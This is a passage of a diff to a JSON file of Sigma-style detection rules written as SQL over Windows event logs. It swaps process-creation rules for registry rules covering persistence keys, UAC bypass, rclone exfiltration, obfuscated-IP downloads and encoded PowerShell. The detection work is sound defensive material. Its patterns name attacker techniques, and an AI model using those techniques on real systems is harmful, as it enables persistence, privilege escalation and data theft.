'%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": 
"registry_set_persistence_ifilter.yml" + }, + { + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Obfuscated IP Download", - "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "title": "Potential Persistence Via Visual Studio Tools for Office", + "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "status": "experimental", - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery" + "attack.t1137.006", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate Addin Installation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program 
Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" + "filename": "registry_set_persistence_office_vsto.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", - "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "status": "experimental", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 
'%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "JSC Convert Javascript To Executable", - "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "title": "Potential Persistence Via Custom Protocol Handler", + "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "status": "experimental", - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "author": "frack113", + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering a new custom protocol handler" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND NewValue LIKE 'URL:%' ESCAPE '\\') AND NOT ((NewValue LIKE 'URL:ms-%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_jsc.yml" + "filename": 
"registry_set_persistence_custom_protocol_handler.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.persistence" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": 
"PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", - "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value 
modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Findstr Launching .lnk File", - "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "title": "DNS-over-HTTPS Enabled by Registry", + "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "status": "test", - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "author": "Trent Liffick", + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be 
used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "author": "Austin Songer", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" + "attack.t1140", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND NewValue = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "proc_creation_win_findstr_lnk.yml" + "filename": "registry_set_dns_over_https_enabled.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1112" + ], 
"falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_public_folder.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "title": "Outlook Security Settings Updated - Registry", + "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects changes to the registry values related to 
outlook security settings", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_office_outlook_security_settings.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "ServiceDll Hijack", + "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], "falsepositives": [ - "Software installation" + "Administrative scripts", + "Installation of a service" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_servicedll_hijack.yml" }, { - "title": "Esentutl Steals Browser Information", - "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", - "status": 
"experimental", - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", - "author": "frack113", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_esentutl_webcache.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 